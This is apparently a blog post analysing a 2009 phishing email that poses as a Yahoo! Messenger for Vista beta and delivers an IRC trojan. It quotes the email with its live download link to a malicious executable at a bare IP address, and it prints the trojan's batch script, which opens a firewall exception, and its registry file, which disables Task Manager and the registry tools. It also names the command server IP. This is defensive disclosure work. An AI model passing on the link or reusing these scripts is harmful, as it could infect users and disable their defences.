Yahoo! Messenger <http://messenger.yahoo.com>
Preview the new
Yahoo! Messenger for Vista™
The new messenger Vista 9.3 now works on Windows XP too. Download Now <http://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe>
Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <http://new.groups.yahoo.com/ymessenger_for_vista/join>
We need your help to improve the product.
» Send feedback <http://feedback.help.yahoo.com/feedback.php?.src=MSNGRVISTA&.from=web>
See Yahoo! Messenger for Vista in action.
» Watch the video preview
Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).
See what's in store...
* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling
©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.
Copyright © 2008 Yahoo! Inc. <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=0/SIG=10np9vmbm/*http://www.yahoo.com/> All rights reserved. Privacy Policy <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=1/SIG=11b8diacl/*http://privacy.yahoo.com/privacy/us/mesg/> - Terms of Service <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/info/terms/> - Copyright/IP Policy <http://us.ard.yahoo.com/SIG=14t> - Help <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=4/SIG=119174mfa/*http://help.yahoo.com/help/us/messenger>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13ulcavcq%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d431143132%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=129gtep8a%2fN%3dy0jjD9j8a4Q-%2fC%3d-1%2fD%3dFSRVY%2fB%3d-1>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13upbop04%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d671435333%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=139fpoc2d%2fN%3dyUjjD9j8a4Q-%2fC%3d224039.2026165.3499947.1964914%2fD%3dFOOT%2fB%3d1058397>
Preview the new
Yahoo! Messenger for Vista™
The new messenger Vista 9.3 now works on Windows XP too. Download Now <http://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe>
Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <http://new.groups.yahoo.com/ymessenger_for_vista/join>
We need your help to improve the product.
» Send feedback <http://feedback.help.yahoo.com/feedback.php?.src=MSNGRVISTA&.from=web>
See Yahoo! Messenger for Vista in action.
» Watch the video preview
Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).
See what's in store...
* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling
©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.
Copyright © 2008 Yahoo! Inc. <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=0/SIG=10np9vmbm/*http://www.yahoo.com/> All rights reserved. Privacy Policy <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=1/SIG=11b8diacl/*http://privacy.yahoo.com/privacy/us/mesg/> - Terms of Service <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=2/SIG=1136qnvkg/*http://docs.yahoo.com/info/terms/> - Copyright/IP Policy <http://us.ard.yahoo.com/SIG=14t> - Help <http://us.ard.yahoo.com/SIG=14tuhfkju/M=224039.2026165.3499947.1964914/D=pager/S=97751562:FOOT/Y=YAHOO/EXP=1208196992/L=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S/B=yUjjD9j8a4Q-/J=1208189792481248/A=1058397/R=4/SIG=119174mfa/*http://help.yahoo.com/help/us/messenger>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13ulcavcq%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d431143132%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=129gtep8a%2fN%3dy0jjD9j8a4Q-%2fC%3d-1%2fD%3dFSRVY%2fB%3d-1>
<http://us.bc.yahoo.com/b?P=2s9tJNj8a98mU.07R_Qz9yowrJ4F0EgDg2AAB01S&T=13upbop04%2fX%3d1208189792%2fE%3d97751562%2fR%3dpager%2fK%3d5%2fV%3d2.1%2fW%3dH%2fY%3dYAHOO%2fF%3d671435333%2fQ%3d-1%2fS%3d1%2fJ%3d1B6BFCD8&U=139fpoc2d%2fN%3dyUjjD9j8a4Q-%2fC%3d224039.2026165.3499947.1964914%2fD%3dFOOT%2fB%3d1058397>
The link it points to for the download;
hxxp://117.34.79.142/.1/Yahoo_Messenger_9.4_Beta.exe
.. leads to an IP in China. If we scan the file with VirusTotal, we see it's an IRC trojan.
http://www.virustotal.com/analisis/a9e91000bd66003d3871e28c92b51a3b
Extracting the file, shows it claiming to be a .DLL by the name of fp721ext.dll. This DLL however, is actually a folder, and contains the files shown in the following screenshot;
As you can see, there are quite a few in there. mIRC itself, a legit IRC client, has been renamed mircrosoft.exe. The folder also contains a file called csc.cmd. Amongst other things, this adds an exception to the Windows firewall, to allow mircrosoft.exe to connect without warning you, to the attackers IRC channel;
@echo off
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
EXIT
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
EXIT
regis.reg contains the following;
REGEDIT4
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a
[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"
[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"
[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"
[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:0000000a
[HKEY_CURRENT_USER\Software\mIRC\LastRun]
@="1201460626,0"
[HKEY_CURRENT_USER\Software\mIRC\License]
@="17904-1848536"
[HKEY_CURRENT_USER\Software\mIRC\LockOptions]
@="0,4096"
[HKEY_CURRENT_USER\Software\mIRC\UserName]
@="dog@compustress.com"
[HKEY_CURRENT_USER\Software\mIRC\Validated]
@="17904-1848536"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=hex:91,00,00,00
"ClearRecentDocsOnExit"=hex:01,00,00,00
"NoTrayItemsDisplay"=dword:00000001
anyssya.jpg actually is a JPG file, and it's detection at VT is non-existent. However, since it's also loaded by the csc.cmd file, I'm betting it's a little more than it seems.
The infection, judging by the .ini files, seems to connect to 89.35.207.106 (client-8935207106.raknetsoft.ro).
I'll post further analysis once complete. In the meantime, the e-mail itself originated from 66.51.252.238 (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties;
From: Yahoo! Vista
E-mail:vista-yahoo.com@trixbox1.localdomain [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !
E-mail:vista-yahoo.com@trixbox1.localdomain [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !
Posts
No comments:
Post a Comment